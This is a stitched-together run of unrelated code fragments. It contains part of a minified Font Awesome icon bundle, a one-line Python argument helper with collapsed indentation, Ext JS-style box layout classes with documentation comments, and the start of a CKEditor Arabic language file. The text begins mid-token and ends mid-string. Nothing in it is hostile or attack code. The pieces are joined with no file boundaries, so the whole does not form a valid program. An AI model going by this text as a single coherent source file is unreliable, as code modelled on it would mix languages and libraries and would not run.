40z"]},faShareSquare:{prefix:"far",iconName:"share-square",icon:[576,512,[],"f14d","M561.938 158.06L417.94 14.092C387.926-15.922 336 5.097 336 48.032v57.198c-42.45 1.88-84.03 6.55-120.76 17.99-35.17 10.95-63.07 27.58-82.91 49.42C108.22 199.2 96 232.6 96 271.94c0 61.697 33.178 112.455 84.87 144.76 37.546 23.508 85.248-12.651 71.02-55.74-15.515-47.119-17.156-70.923 84.11-78.76V336c0 42.993 51.968 63.913 81.94 33.94l143.998-144c18.75-18.74 18.75-49.14 0-67.88zM384 336V232.16C255.309 234.082 166.492 255.35 206.31 376 176.79 357.55 144 324.08 144 271.94c0-109.334 129.14-118.947 240-119.85V48l144 144-144 144zm24.74 84.493a82.658 82.658 0 0 0 20.974-9.303c7.976-4.952 18.286.826 18.286 10.214V464c0 26.51-21.49 48-48 48H48c-26.51 0-48-21.49-48-48V112c0-26.51 21.49-48 48-48h132c6.627 0 12 5.373 12 12v4.486c0 4.917-2.987 9.369-7.569 11.152-13.702 5.331-26.396 11.537-38.05 18.585a12.138 12.138 0 0 1-6.28 1.777H54a6 6 0 0 0-6 6v340a6 6 0 0 0 6 6h340a6 6 0 0 0 6-6v-25.966c0-5.37 3.579-10.059 8.74-11.541z"]},faSmile:{prefix:"far",iconName:"smile",icon:[496,512,[],"f118","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm-80-216c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160 0c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm4 72.6c-20.8 25-51.5 39.4-84 39.4s-63.2-14.3-84-39.4c-8.5-10.2-23.7-11.5-33.8-3.1-10.2 8.5-11.5 23.6-3.1 33.8 30 36 74.1 56.6 120.9 56.6s90.9-20.6 120.9-56.6c8.5-10.2 7.1-25.3-3.1-33.8-10.1-8.4-25.3-7.1-33.8 3.1z"]},faSmileBeam:{prefix:"far",iconName:"smile-beam",icon:[496,512,[],"f5b8","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm84-143.4c-20.8 25-51.5 39.4-84 39.4s-63.2-14.3-84-39.4c-8.5-10.2-23.6-11.5-33.8-3.1-10.2 8.5-11.5 23.6-3.1 33.8 30 36 74.1 56.6 120.9 56.6s90.9-20.6 120.9-56.6c8.5-10.2 7.1-25.3-3.1-33.8-10.2-8.4-25.3-7.1-33.8 3.1zM136.5 211c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4s-52.7 29.3-56 71.4c-.3 3.7 2.1 7.2 5.7 8.3 3.4 1.1 7.4-.5 9.3-3.7l9.5-17zM328 152c-23.8 0-52.7 29.3-56 71.4-.3 3.7 2.1 7.2 5.7 8.3 3.5 1.1 7.4-.5 9.3-3.7l9.5-17c7.7-13.7 19.2-21.6 31.5-21.6s23.8 7.9 31.5 21.6l9.5 17c2.1 3.7 6.2 4.7 9.3 3.7 3.6-1.1 6-4.5 5.7-8.3-3.3-42.1-32.2-71.4-56-71.4z"]},faSmileWink:{prefix:"far",iconName:"smile-wink",icon:[496,512,[],"f4da","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm117.8-146.4c-10.2-8.5-25.3-7.1-33.8 3.1-20.8 25-51.5 39.4-84 39.4s-63.2-14.3-84-39.4c-8.5-10.2-23.7-11.5-33.8-3.1-10.2 8.5-11.5 23.6-3.1 33.8 30 36 74.1 56.6 120.9 56.6s90.9-20.6 120.9-56.6c8.5-10.2 7.1-25.3-3.1-33.8zM168 240c17.7 0 32-14.3 32-32s-14.3-32-32-32-32 14.3-32 32 14.3 32 32 32zm160-60c-25.7 0-55.9 16.9-59.9 42.1-1.7 11.2 11.5 18.2 19.8 10.8l9.5-8.5c14.8-13.2 46.2-13.2 61 0l9.5 8.5c8.5 7.4 21.6.3 19.8-10.8-3.8-25.2-34-42.1-59.7-42.1z"]},faSnowflake:{prefix:"far",iconName:"snowflake",icon:[448,512,[],"f2dc","M440.1 355.2l-39.2-23 34.1-9.3c8.4-2.3 13.4-11.1 11.1-19.6l-4.1-15.5c-2.2-8.5-10.9-13.6-19.3-11.3L343 298.2 271.2 256l71.9-42.2 79.7 21.7c8.4 2.3 17-2.8 19.3-11.3l4.1-15.5c2.2-8.5-2.7-17.3-11.1-19.6l-34.1-9.3 39.2-23c7.5-4.4 10.1-14.2 5.8-21.9l-7.9-13.9c-4.3-7.7-14-10.3-21.5-5.9l-39.2 23 9.1-34.7c2.2-8.5-2.7-17.3-11.1-19.6l-15.2-4.1c-8.4-2.3-17 2.8-19.3 11.3l-21.3 81-71.9 42.2v-84.5L306 70.4c6.1-6.2 6.1-16.4 0-22.6l-11.1-11.3c-6.1-6.2-16.1-6.2-22.2 0l-24.9 25.4V16c0-8.8-7-16-15.7-16h-15.7c-8.7 0-15.7 7.2-15.7 16v46.1l-24.9-25.4c-6.1-6.2-16.1-6.2-22.2 0L142.1 48c-6.1 6.2-6.1 16.4 0 22.6l58.3 59.3v84.5l-71.9-42.2-21.3-81c-2.2-8.5-10.9-13.6-19.3-11.3L72.7 84c-8.4 2.3-13.4 11.1-11.1 19.6l9.1 34.7-39.2-23c-7.5-4.4-17.1-1.8-21.5 5.9l-7.9 13.9c-4.3 7.7-1.8 17.4 5.8 21.9l39.2 23-34.1 9.1c-8.4 2.3-13.4 11.1-11.1 19.6L6 224.2c2.2 8.5 10.9 13.6 19.3 11.3l79.7-21.7 71.9 42.2-71.9 42.2-79.7-21.7c-8.4-2.3-17 2.8-19.3 11.3l-4.1 15.5c-2.2 8.5 2.7 17.3 11.1 19.6l34.1 9.3-39.2 23c-7.5 4.4-10.1 14.2-5.8 21.9L10 391c4.3 7.7 14 10.3 21.5 5.9l39.2-23-9.1 34.7c-2.2 8.5 2.7 17.3 11.1 19.6l15.2 4.1c8.4 2.3 17-2.8 19.3-11.3l21.3-81 71.9-42.2v84.5l-58.3 59.3c-6.1 6.2-6.1 16.4 0 22.6l11.1 11.3c6.1 6.2 16.1 6.2 22.2 0l24.9-25.4V496c0 8.8 7 16 15.7 16h15.7c8.7 0 15.7-7.2 15.7-16v-46.1l24.9 25.4c6.1 6.2 16.1 6.2 22.2 0l11.1-11.3c6.1-6.2 6.1-16.4 0-22.6l-58.3-59.3v-84.5l71.9 42.2 21.3 81c2.2 8.5 10.9 13.6 19.3 11.3L375 428c8.4-2.3 13.4-11.1 11.1-19.6l-9.1-34.7 39.2 23c7.5 4.4 17.1 1.8 21.5-5.9l7.9-13.9c4.6-7.5 2.1-17.3-5.5-21.7z"]},faSquare:{prefix:"far",iconName:"square",icon:[448,512,[],"f0c8","M400 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm-6 400H54c-3.3 0-6-2.7-6-6V86c0-3.3 2.7-6 6-6h340c3.3 0 6 2.7 6 6v340c0 3.3-2.7 6-6 6z"]},faStar:{prefix:"far",iconName:"star",icon:[576,512,[],"f005","M528.1 171.5L382 150.2 316.7 17.8c-11.7-23.6-45.6-23.9-57.4 0L194 150.2 47.9 171.5c-26.2 3.8-36.7 36.1-17.7 54.6l105.7 103-25 145.5c-4.5 26.3 23.2 46 46.4 33.7L288 439.6l130.7 68.7c23.2 12.2 50.9-7.4 46.4-33.7l-25-145.5 105.7-103c19-18.5 8.5-50.8-17.7-54.6zM388.6 312.3l23.7 138.4L288 385.4l-124.3 65.3 23.7-138.4-100.6-98 139-20.2 62.2-126 62.2 126 139 20.2-100.6 98z"]},faStarHalf:{prefix:"far",iconName:"star-half",icon:[576,512,[],"f089","M288 385.3l-124.3 65.4 23.7-138.4-100.6-98 139-20.2 62.2-126V0c-11.4 0-22.8 5.9-28.7 17.8L194 150.2 47.9 171.4c-26.2 3.8-36.7 36.1-17.7 54.6l105.7 103-25 145.5c-4.5 26.1 23 46 46.4 33.7L288 439.6v-54.3z"]},faStickyNote:{prefix:"far",iconName:"sticky-note",icon:[448,512,[],"f249","M448 348.106V80c0-26.51-21.49-48-48-48H48C21.49 32 0 53.49 0 80v351.988c0 26.51 21.49 48 48 48h268.118a48 48 0 0 0 33.941-14.059l83.882-83.882A48 48 0 0 0 448 348.106zm-128 80v-76.118h76.118L320 428.106zM400 80v223.988H296c-13.255 0-24 10.745-24 24v104H48V80h352z"]},faStopCircle:{prefix:"far",iconName:"stop-circle",icon:[512,512,[],"f28d","M504 256C504 119 393 8 256 8S8 119 8 256s111 248 248 248 248-111 248-248zm-448 0c0-110.5 89.5-200 200-200s200 89.5 200 200-89.5 200-200 200S56 366.5 56 256zm296-80v160c0 8.8-7.2 16-16 16H176c-8.8 0-16-7.2-16-16V176c0-8.8 7.2-16 16-16h160c8.8 0 16 7.2 16 16z"]},faSun:{prefix:"far",iconName:"sun",icon:[512,512,[],"f185","M494.2 221.9l-59.8-40.5 13.7-71c2.6-13.2-1.6-26.8-11.1-36.4-9.6-9.5-23.2-13.7-36.2-11.1l-70.9 13.7-40.4-59.9c-15.1-22.3-51.9-22.3-67 0l-40.4 59.9-70.8-13.7C98 60.4 84.5 64.5 75 74.1c-9.5 9.6-13.7 23.1-11.1 36.3l13.7 71-59.8 40.5C6.6 229.5 0 242 0 255.5s6.7 26 17.8 33.5l59.8 40.5-13.7 71c-2.6 13.2 1.6 26.8 11.1 36.3 9.5 9.5 22.9 13.7 36.3 11.1l70.8-13.7 40.4 59.9C230 505.3 242.6 512 256 512s26-6.7 33.5-17.8l40.4-59.9 70.9 13.7c13.4 2.7 26.8-1.6 36.3-11.1 9.5-9.5 13.6-23.1 11.1-36.3l-13.7-71 59.8-40.5c11.1-7.5 17.8-20.1 17.8-33.5-.1-13.6-6.7-26.1-17.9-33.7zm-112.9 85.6l17.6 91.2-91-17.6L256 458l-51.9-77-90.9 17.6 17.6-91.2-76.8-52 76.8-52-17.6-91.2 91 17.6L256 53l51.9 76.9 91-17.6-17.6 91.1 76.8 52-76.8 52.1zM256 152c-57.3 0-104 46.7-104 104s46.7 104 104 104 104-46.7 104-104-46.7-104-104-104zm0 160c-30.9 0-56-25.1-56-56s25.1-56 56-56 56 25.1 56 56-25.1 56-56 56z"]},faSurprise:{prefix:"far",iconName:"surprise",icon:[496,512,[],"f5c2","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm0-176c-35.3 0-64 28.7-64 64s28.7 64 64 64 64-28.7 64-64-28.7-64-64-64zm-48-72c0-17.7-14.3-32-32-32s-32 14.3-32 32 14.3 32 32 32 32-14.3 32-32zm128-32c-17.7 0-32 14.3-32 32s14.3 32 32 32 32-14.3 32-32-14.3-32-32-32z"]},faThumbsDown:{prefix:"far",iconName:"thumbs-down",icon:[512,512,[],"f165","M466.27 225.31c4.674-22.647.864-44.538-8.99-62.99 2.958-23.868-4.021-48.565-17.34-66.99C438.986 39.423 404.117 0 327 0c-7 0-15 .01-22.22.01C201.195.01 168.997 40 128 40h-10.845c-5.64-4.975-13.042-8-21.155-8H32C14.327 32 0 46.327 0 64v240c0 17.673 14.327 32 32 32h64c11.842 0 22.175-6.438 27.708-16h7.052c19.146 16.953 46.013 60.653 68.76 83.4 13.667 13.667 10.153 108.6 71.76 108.6 57.58 0 95.27-31.936 95.27-104.73 0-18.41-3.93-33.73-8.85-46.54h36.48c48.602 0 85.82-41.565 85.82-85.58 0-19.15-4.96-34.99-13.73-49.84zM64 296c-13.255 0-24-10.745-24-24s10.745-24 24-24 24 10.745 24 24-10.745 24-24 24zm330.18 16.73H290.19c0 37.82 28.36 55.37 28.36 94.54 0 23.75 0 56.73-47.27 56.73-18.91-18.91-9.46-66.18-37.82-94.54C206.9 342.89 167.28 272 138.92 272H128V85.83c53.611 0 100.001-37.82 171.64-37.82h37.82c35.512 0 60.82 17.12 53.12 65.9 15.2 8.16 26.5 36.44 13.94 57.57 21.581 20.384 18.699 51.065 5.21 65.62 9.45 0 22.36 18.91 22.27 37.81-.09 18.91-16.71 37.82-37.82 37.82z"]},faThumbsUp:{prefix:"far",iconName:"thumbs-up",icon:[512,512,[],"f164","M466.27 286.69C475.04 271.84 480 256 480 236.85c0-44.015-37.218-85.58-85.82-85.58H357.7c4.92-12.81 8.85-28.13 8.85-46.54C366.55 31.936 328.86 0 271.28 0c-61.607 0-58.093 94.933-71.76 108.6-22.747 22.747-49.615 66.447-68.76 83.4H32c-17.673 0-32 14.327-32 32v240c0 17.673 14.327 32 32 32h64c14.893 0 27.408-10.174 30.978-23.95 44.509 1.001 75.06 39.94 177.802 39.94 7.22 0 15.22.01 22.22.01 77.117 0 111.986-39.423 112.94-95.33 13.319-18.425 20.299-43.122 17.34-66.99 9.854-18.452 13.664-40.343 8.99-62.99zm-61.75 53.83c12.56 21.13 1.26 49.41-13.94 57.57 7.7 48.78-17.608 65.9-53.12 65.9h-37.82c-71.639 0-118.029-37.82-171.64-37.82V240h10.92c28.36 0 67.98-70.89 94.54-97.46 28.36-28.36 18.91-75.63 37.82-94.54 47.27 0 47.27 32.98 47.27 56.73 0 39.17-28.36 56.72-28.36 94.54h103.99c21.11 0 37.73 18.91 37.82 37.82.09 18.9-12.82 37.81-22.27 37.81 13.489 14.555 16.371 45.236-5.21 65.62zM88 432c0 13.255-10.745 24-24 24s-24-10.745-24-24 10.745-24 24-24 24 10.745 24 24z"]},faTimesCircle:{prefix:"far",iconName:"times-circle",icon:[512,512,[],"f057","M256 8C119 8 8 119 8 256s111 248 248 248 248-111 248-248S393 8 256 8zm0 448c-110.5 0-200-89.5-200-200S145.5 56 256 56s200 89.5 200 200-89.5 200-200 200zm101.8-262.2L295.6 256l62.2 62.2c4.7 4.7 4.7 12.3 0 17l-22.6 22.6c-4.7 4.7-12.3 4.7-17 0L256 295.6l-62.2 62.2c-4.7 4.7-12.3 4.7-17 0l-22.6-22.6c-4.7-4.7-4.7-12.3 0-17l62.2-62.2-62.2-62.2c-4.7-4.7-4.7-12.3 0-17l22.6-22.6c4.7-4.7 12.3-4.7 17 0l62.2 62.2 62.2-62.2c4.7-4.7 12.3-4.7 17 0l22.6 22.6c4.7 4.7 4.7 12.3 0 17z"]},faTired:{prefix:"far",iconName:"tired",icon:[496,512,[],"f5c8","M248 8C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-110.3 0-200-89.7-200-200S137.7 56 248 56s200 89.7 200 200-89.7 200-200 200zm129.1-303.8c-3.8-4.4-10.3-5.4-15.3-2.5l-80 48c-3.6 2.2-5.8 6.1-5.8 10.3s2.2 8.1 5.8 10.3l80 48c5.4 3.2 11.8 1.6 15.3-2.5 3.8-4.5 3.9-11 .1-15.5L343.6 208l33.6-40.3c3.8-4.5 3.7-11.1-.1-15.5zM220 208c0-4.2-2.2-8.1-5.8-10.3l-80-48c-5-3-11.5-1.9-15.3 2.5-3.8 4.5-3.9 11-.1 15.5l33.6 40.3-33.6 40.3c-3.8 4.5-3.7 11 .1 15.5 3.5 4.1 9.9 5.7 15.3 2.5l80-48c3.6-2.2 5.8-6.1 5.8-10.3zm28 64c-45.4 0-100.9 38.3-107.8 93.3-1.5 11.8 6.9 21.6 15.5 17.9C178.4 373.5 212 368 248 368s69.6 5.5 92.3 15.2c8.5 3.7 17-6 15.5-17.9-6.9-55-62.4-93.3-107.8-93.3z"]},faTrashAlt:{prefix:"far",iconName:"trash-alt",icon:[448,512,[],"f2ed","M268 416h24a12 12 0 0 0 12-12V188a12 12 0 0 0-12-12h-24a12 12 0 0 0-12 12v216a12 12 0 0 0 12 12zM432 80h-82.41l-34-56.7A48 48 0 0 0 274.41 0H173.59a48 48 0 0 0-41.16 23.3L98.41 80H16A16 16 0 0 0 0 96v16a16 16 0 0 0 16 16h16v336a48 48 0 0 0 48 48h288a48 48 0 0 0 48-48V128h16a16 16 0 0 0 16-16V96a16 16 0 0 0-16-16zM171.84 50.91A6 6 0 0 1 177 48h94a6 6 0 0 1 5.15 2.91L293.61 80H154.39zM368 464H80V128h288zm-212-48h24a12 12 0 0 0 12-12V188a12 12 0 0 0-12-12h-24a12 12 0 0 0-12 12v216a12 12 0 0 0 12 12z"]},faUser:{prefix:"far",iconName:"user",icon:[448,512,[],"f007","M313.6 304c-28.7 0-42.5 16-89.6 16-47.1 0-60.8-16-89.6-16C60.2 304 0 364.2 0 438.4V464c0 26.5 21.5 48 48 48h352c26.5 0 48-21.5 48-48v-25.6c0-74.2-60.2-134.4-134.4-134.4zM400 464H48v-25.6c0-47.6 38.8-86.4 86.4-86.4 14.6 0 38.3 16 89.6 16 51.7 0 74.9-16 89.6-16 47.6 0 86.4 38.8 86.4 86.4V464zM224 288c79.5 0 144-64.5 144-144S303.5 0 224 0 80 64.5 80 144s64.5 144 144 144zm0-240c52.9 0 96 43.1 96 96s-43.1 96-96 96-96-43.1-96-96 43.1-96 96-96z"]},faUserCircle:{prefix:"far",iconName:"user-circle",icon:[496,512,[],"f2bd","M248 104c-53 0-96 43-96 96s43 96 96 96 96-43 96-96-43-96-96-96zm0 144c-26.5 0-48-21.5-48-48s21.5-48 48-48 48 21.5 48 48-21.5 48-48 48zm0-240C111 8 0 119 0 256s111 248 248 248 248-111 248-248S385 8 248 8zm0 448c-49.7 0-95.1-18.3-130.1-48.4 14.9-23 40.4-38.6 69.6-39.5 20.8 6.4 40.6 9.6 60.5 9.6s39.7-3.1 60.5-9.6c29.2 1 54.7 16.5 69.6 39.5-35 30.1-80.4 48.4-130.1 48.4zm162.7-84.1c-24.4-31.4-62.1-51.9-105.1-51.9-10.2 0-26 9.6-57.6 9.6-31.5 0-47.4-9.6-57.6-9.6-42.9 0-80.6 20.5-105.1 51.9C61.9 339.2 48 299.2 48 256c0-110.3 89.7-200 200-200s200 89.7 200 200c0 43.2-13.9 83.2-37.3 115.9z"]},faWindowClose:{prefix:"far",iconName:"window-close",icon:[512,512,[],"f410","M464 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h416c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm0 394c0 3.3-2.7 6-6 6H54c-3.3 0-6-2.7-6-6V86c0-3.3 2.7-6 6-6h404c3.3 0 6 2.7 6 6v340zM356.5 194.6L295.1 256l61.4 61.4c4.6 4.6 4.6 12.1 0 16.8l-22.3 22.3c-4.6 4.6-12.1 4.6-16.8 0L256 295.1l-61.4 61.4c-4.6 4.6-12.1 4.6-16.8 0l-22.3-22.3c-4.6-4.6-4.6-12.1 0-16.8l61.4-61.4-61.4-61.4c-4.6-4.6-4.6-12.1 0-16.8l22.3-22.3c4.6-4.6 12.1-4.6 16.8 0l61.4 61.4 61.4-61.4c4.6-4.6 12.1-4.6 16.8 0l22.3 22.3c4.7 4.6 4.7 12.1 0 16.8z"]},faWindowMaximize:{prefix:"far",iconName:"window-maximize",icon:[512,512,[],"f2d0","M464 32H48C21.5 32 0 53.5 0 80v352c0 26.5 21.5 48 48 48h416c26.5 0 48-21.5 48-48V80c0-26.5-21.5-48-48-48zm0 394c0 3.3-2.7 6-6 6H54c-3.3 0-6-2.7-6-6V192h416v234z"]},faWindowMinimize:{prefix:"far",iconName:"window-minimize",icon:[512,512,[],"f2d1","M480 480H32c-17.7 0-32-14.3-32-32s14.3-32 32-32h448c17.7 0 32 14.3 32 32s-14.3 32-32 32z"]},faWindowRestore:{prefix:"far",iconName:"window-restore",icon:[512,512,[],"f2d2","M464 0H144c-26.5 0-48 21.5-48 48v48H48c-26.5 0-48 21.5-48 48v320c0 26.5 21.5 48 48 48h320c26.5 0 48-21.5 48-48v-48h48c26.5 0 48-21.5 48-48V48c0-26.5-21.5-48-48-48zm-96 464H48V256h320v208zm96-96h-48V144c0-26.5-21.5-48-48-48H144V48h320v320z"]}}},xggJ:function(c,e,t){"use strict";var n=t("0Cba");t.d(e,"a",function(){return n});var a=t("KNgm");t.d(e,"b",function(){return a})},xySv:function(c,e,t){"use strict";t.d(e,"a",function(){return n});var n={BOTTOM:"bottom",BOTTOM_LEFT:"bottom-left",BOTTOM_RIGHT:"bottom-right",LEFT:"left",LEFT_BOTTOM:"left-bottom",LEFT_TOP:"left-top",RIGHT:"right",RIGHT_BOTTOM:"right-bottom",RIGHT_TOP:"right-top",TOP:"top",TOP_LEFT:"top-left",TOP_RIGHT:"top-right"}}},[["e9Nx","5d41","9da1","ad9d"]]]);
def isArg(args, index, default=False): try: arg = args[index] if type(arg) == str: return arg except: return default
/** * @class Ext.layout.BoxLayout * @extends Ext.layout.ContainerLayout * <p>Base Class for HBoxLayout and VBoxLayout Classes. Generally it should not need to be used directly.</p> */ Ext.layout.BoxLayout = Ext.extend(Ext.layout.ContainerLayout, { type: 'box', targetCls: 'x-layout-box', //wrapCls: 'x-layout-box-wrap', innerCls: 'x-layout-box-inner', // document these properties on their subclasses pack : 'start', align: 'center', notifyOwnerCtContainer: true, fixedLayout: false, /** * @cfg {String} direction Specifies the direction in which child components are laid out. Defaults * to <tt>'normal'</tt>, which means they are laid out in the order they are added. You can use the * <tt>'reverse'</tt> option to have them laid out in reverse. */ direction: 'normal', /** * @private * Runs the child box calculations and caches them in childBoxCache. Subclasses can used these cached values * when laying out */ onLayout: function() { Ext.layout.BoxLayout.superclass.onLayout.call(this); if (this.pack === 'left' || this.pack === 'top') { this.pack = 'start'; } else if (this.pack === 'right' || this.pack === 'bottom') { this.pack = 'end'; } var target = this.getTarget(), ct = target.parent(), targetWidth = (ct.getWidth() - ct.getPadding('lr') - ct.getBorderWidth('lr')) + 'px', targetHeight = (ct.getHeight() - ct.getPadding('tb') - ct.getBorderWidth('tb')) + 'px'; target.setStyle({ '-webkit-box-orient': this.orientation, '-webkit-box-direction': this.direction, '-webkit-box-pack': this.pack, '-webkit-box-align': this.align }); if (this.orientation == 'horizontal') { target.setStyle({ 'min-width': targetWidth, 'height': targetHeight }); } else { target.setStyle({ 'min-height': targetHeight, 'width': targetWidth }); } this.prepareFlexedItems(); this.setFlexedItems(); }, prepareFlexedItems : function() { var items = this.getLayoutItems(), ln = items.length, item, i; for (i = 0; i < ln; i++) { item = items[i]; if (item.flex != undefined) { item.el.setStyle('position', 'absolute'); item.boxEl = this.createBoxEl(item); } else { item.doComponentLayout(); } } }, setFlexedItems : function() { var items = this.getLayoutItems(), ln = items.length, item, i; for (i = 0; i < ln; i++) { item = items[i]; if (item.flex != undefined) { item.boxSize = item.boxEl.getSize(); } } for (i = 0; i < ln; i++) { item = items[i]; if (item.flex != undefined) { item.el.setStyle('position', ''); if (this.align == 'stretch') { item.setSize(item.boxSize); } else { if (this.orientation == 'horizontal') { item.setWidth(item.boxSize.width); } else { item.setHeight(item.boxSize.height); } } item.boxEl.remove(); delete item.boxEl; delete item.boxSize; } } }, getTarget : function() { var owner = this.owner, innerCt = this.innerCt; if (!innerCt) { if (owner.scrollEl) { innerCt = owner.scrollEl.addCls(this.innerCls); } else { innerCt = owner.getTargetEl().createChild({cls: this.innerCls}); } this.innerCt = innerCt; } return innerCt; }, createBoxEl : function(item) { var el = item.el; return el.insertSibling({ style: 'margin-top: ' + el.getMargin('tb') + 'px; margin-left: ' + el.getMargin('lr') + 'px; -webkit-box-flex: ' + item.flex }); } }); /** * @class Ext.layout.HBoxLayout * @extends Ext.layout.BoxLayout * <p>A layout that arranges items horizontally across a Container. This layout optionally divides available horizontal * space between child items containing a numeric <code>flex</code> configuration. The flex option is a ratio that * distributes width after any items with explicit widths have been accounted for. In the code below, the width is calculated * as follows: * <ul> * <li>The fixed width item is subtracted, leaving us with 300 width</li> * <li>The total flex number is counted, in this case, it is 3</li> * <li>The ratio is then calculated, 300 / 3 = 100</li> * <li>The first item has a flex of 2, so it is set to 2 * 100</li> * <li>The other remaining item is set to 1 * 100</li> * </ul></p> * <pre><code> new Ext.Container({ width: 400, height: 300, layout: { type: 'hbox', align: 'stretch' }, items: [{ flex: 2, html: 'First' },{ width: 100, html: 'Second' },{ flex: 1, html: 'Third' }] }); * </code></pre> * This layout may also be used to set the heights of child items by configuring it with the {@link #align} option. */ Ext.layout.HBoxLayout = Ext.extend(Ext.layout.BoxLayout, { orientation: 'horizontal' /** * @cfg {String} pack * Specifies the horizontal alignment of child components. Defaults to <tt>'start'</tt>. Acceptable values are: * <ul> * <li><b>center</b> : <div class="sub-desc"> * Aligned to the center of the container. * </div></li> * * <li><b>end</b> : <div class="sub-desc"> * Aligned to the right of the container. * </div></li> * * <li><b>justify</b> : <div class="sub-desc"> * Justified with both the left and right of the container. * </div></li> * * <li><b>start</b> : <div class="sub-desc"> * Aligned to the left of the container. * </div></li> * </ul> */ /** * @cfg {String} align Specifies the vertical alignment of child components. Defaults to <tt>'center'</tt>. Acceptable values are: * <ul> * <li><b>center</b> : <div class="sub-desc"> * Aligned to the center of the container. * </div></li> * * <li><b>end</b> : <div class="sub-desc"> * Aligned to the bottom of the container. * </div></li> * * <li><b>start</b> : <div class="sub-desc"> * Aligned to the top of the container. * </div></li> * * <li><b>stretch</b> : <div class="sub-desc"> * Components are stretched vertically to fill the container. * </div></li> * </ul> */ }); Ext.regLayout('hbox', Ext.layout.HBoxLayout); /** * @class Ext.layout.VBoxLayout * @extends Ext.layout.BoxLayout * <p>A layout that arranges items vertically down a Container. This layout optionally divides available vertical * space between child items containing a numeric <code>flex</code> configuration. The flex option is a ratio that * distributes height after any items with explicit heights have been accounted for. In the code below, the height is calculated * as follows: * <ul> * <li>The fixed height item is subtracted, leaving us with 300 height</li> * <li>The total flex number is counted, in this case, it is 3</li> * <li>The ratio is then calculated, 300 / 3 = 100</li> * <li>The first item has a flex of 2, so it is set to 2 * 100</li> * <li>The other remaining item is set to 1 * 100</li> * </ul></p> * <pre><code> new Ext.Container({ width: 300, height: 400, layout: { type: 'vbox', align: 'stretch' }, items: [{ flex: 2, html: 'First' },{ width: 100, html: 'Second' },{ flex: 1, html: 'Third' }] }); * </code></pre> * This layout may also be used to set the widths of child items by configuring it with the {@link #align} option. */ Ext.layout.VBoxLayout = Ext.extend(Ext.layout.BoxLayout, { orientation: 'vertical' /** * @cfg {String} pack * Specifies the vertical alignment of child components. Defaults to <tt>'start'</tt>. Acceptable values are: * <ul> * <li><b>center</b> : <div class="sub-desc"> * Aligned to the center of the container. * </div></li> * * <li><b>end</b> : <div class="sub-desc"> * Aligned to the bottom of the container. * </div></li> * * <li><b>justify</b> : <div class="sub-desc"> * Justified with both the top and bottom of the container. * </div></li> * * <li><b>start</b> : <div class="sub-desc"> * Aligned to the top of the container. * </div></li> * </ul> */ /** * @cfg {String} align Specifies the horizontal alignignment of child components. Defaults to <tt>'center'</tt>. Acceptable values are: * <ul> * <li><b>center</b> : <div class="sub-desc"> * Aligned to the center of the container. * </div></li> * * <li><b>end</b> : <div class="sub-desc"> * Aligned to the right of the container. * </div></li> * * <li><b>start</b> : <div class="sub-desc"> * Aligned to the left of the container. * </div></li> * * <li><b>stretch</b> : <div class="sub-desc"> * Components are stretched horizontally to fill the container. * </div></li> * </ul> */ }); Ext.regLayout('vbox', Ext.layout.VBoxLayout);
/* Copyright (c) 2003-2019, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.md or https://ckeditor.com/legal/ckeditor-oss-license */ CKEDITOR.lang['ar']={"wsc":{"btnIgnore":"تجاهل","btnIgnoreAll":"تجاهل الكل","btnReplace":"تغيير","btnReplaceAll":"تغيير الكل","btnUndo":"تراجع","changeTo":"التغيير إلى","errorLoading":"خطأ في تحميل تطبيق خدمة الاستضافة: %s.","ieSpellDownload":"المدقق الإملائي (الإنجليزي) غير مثبّت. هل تود تحميله الآن؟","manyChanges":"تم إكمال التدقيق الإملائي: تم تغيير %1 من كلمات","noChanges":"تم التدقيق الإملائي: لم يتم تغيير أي كلمة","noMispell":"تم التدقيق الإملائي: لم يتم العثور على أي أخطاء إملائية","noSuggestions":"- لا توجد إقتراحات -","notAvailable":"عفواً، ولكن هذه الخدمة غير متاحة الان","notInDic":"ليست في القاموس","oneChange":"تم التدقيق الإملائي: تم تغيير كلمة واحدة فقط","progress":"جاري التدقيق الاملائى","title":"التدقيق الإملائي","toolbar":"تدقيق إملائي"},"widget":{"move":"إضغط و إسحب للتحريك","label":"%1 widget"},"uploadwidget":{"abort":"Upload aborted by the user.","doneOne":"File successfully uploaded.","doneMany":"Successfully uploaded %1 files.","uploadOne":"Uploading file ({percentage}%)...","uploadMany":"Uploading files, {current} of {max} done ({percentage}%)..."},"undo":{"redo":"إعادة","undo":"تراجع"},"toolbar":{"toolbarCollapse":"تقليص شريط الأدوت","toolbarExpand":"تمديد شريط الأدوات","toolbarGroups":{"document":"مستند","clipboard":"الحافظة/الرجوع","editing":"تحرير","forms":"نماذج","basicstyles":"نمط بسيط","paragraph":"فقرة","links":"روابط","insert":"إدراج","styles":"أنماط","colors":"ألوان","tools":"أدوات"},"toolbars":"أشرطة أدوات المحرر"},"table":{"border":"الحدود","caption":"الوصف","cell":{"menu":"خلية","insertBefore":"إدراج خلية قبل","insertAfter":"إدراج خلية بعد","deleteCell":"حذف خلية","merge":"دمج خلايا","mergeRight":"دمج لليمين","mergeDown":"دمج للأسفل","splitHorizontal":"تقسيم الخلية 